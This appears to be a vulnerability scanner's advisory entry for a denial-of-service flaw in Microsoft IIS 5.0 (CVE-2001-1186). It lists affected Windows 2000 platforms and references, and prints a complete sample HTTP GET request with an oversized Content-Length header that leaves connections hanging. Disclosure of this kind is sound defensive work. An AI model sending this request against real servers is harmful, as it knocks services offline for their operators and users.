| VID |
12011 |
| Severity |
20 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
WWW |
| Detailed Description |
The IIS 5.0 server is vulnerable to a Denial of Service attack via a HTTP request with a false Content-Length value.
If a remote attacker send the IIS web server the following HTTP GET Header, containing a falsified Content-Length value that is larger than the size of the request,
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic
IIS web server keeps the connection open and does not time out, but does not respond otherwise. If opening multiple connections such as this is increased, the server will not serve for the new request of connection. It is possible that this cause a denial of service to the web server.
* References:
http://www.iss.net/security_center/static/7691.php
http://online.securityfocus.com/bid/3667
* Platforms Affected:
Microsoft IIS 5.0
- Windows 2000 Advanced Server
- Windows 2000 Advanced Server SP1/SP2
- Windows 2000 Datacenter Server SP1/SP2
- Windows 2000 Professional
- Windows 2000 Professional SP1/SP2
- Windows 2000 Server
- Windows 2000 Server SP1/SP2 |
| Recommendation |
No remedy available as of December 2002. |
| Related URL |
CVE-2001-1186 (CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
(ISS) |
|
